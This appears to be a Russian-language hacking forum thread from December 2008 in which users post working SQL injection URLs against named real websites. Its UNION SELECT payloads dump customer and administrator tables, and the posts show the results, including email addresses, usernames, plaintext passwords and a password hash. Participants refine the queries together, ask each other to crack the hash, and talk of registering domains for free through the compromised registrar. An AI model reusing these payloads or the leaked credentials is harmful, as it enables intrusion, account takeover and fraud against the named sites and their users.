root/6teutd7UL7NG.
http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,email,passwd)+from +customer+limit+4200,1/*
felipe_e@hotmail.com/19l0ZUzMeK.b.
Gemini12
30.12.2008, 01:42
http://forparentssake.com/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,p assword),7,8+from+users--
aDMin:03110WoodBury
-m0rgan-
30.12.2008, 01:43
Вот кароче что я обкуренный нафигачил:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5+from+information_schema.tables--
Из таблицы tbladmins:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5+from+information_schema.tables--
А вот составить финальный запрос не получилось, как я токо не шифровал...((((
Кароче кто сможет, отпишитесь ниже(!!!), будем все домены на халяву регать=))))
------------------------------------------------------------
The End!
Red_Red1
30.12.2008, 02:01
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(concat(use rname,0x3A,password)))),3,4,5+from+naira_clients.t bladmins--
За group_concat - спасибо, незнал.
-m0rgan-, а финальный - это какой ?)
http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x2F,username,password) ,3,4,5+from+naira_clients.tbladmins
ADMIN/E7AA807F2B59DE7B73495FF59B30EC26
опередили, потрите плз )
masternet
30.12.2008, 02:04
Вот кароче что я обкуренный нафигачил:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5+from+information_schema.tables--
Из таблицы tbladmins:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5+from+information_schema.tables--
А вот составить финальный запрос не получилось, как я токо не шифровал...((((
Кароче кто сможет, отпишитесь ниже(!!!), будем все домены на халяву регать=))))
------------------------------------------------------------
The End!
http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),username ,password),3,4,5+from+naira_clients.tbladmins--
элементарно,ватсон!
расшифруете хеш пмните мне)))
Gemini12
30.12.2008, 02:19
А мне он выдал
http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5+from+admins--
master:master
тока в админку не пускает (
Gemini12
30.12.2008, 02:21
http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),username ,password),3,4,5+from+naira_clients.tbladmins--
элементарно,ватсон!
расшифруете хеш пмните мне)))
И мне в ПМ плз!!!! :D :D :D
Aattcottonbowl.com - PR5 ~2к
http://www.attcottonbowl.com/news_room/releases.php?uid=210'+union+select+1,2,3,4,5,email ,7,uid,9,10,11,12,13,version(),15,16+from+user+lim it+1,1/*
4 ветка.. подбирайте поля )
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot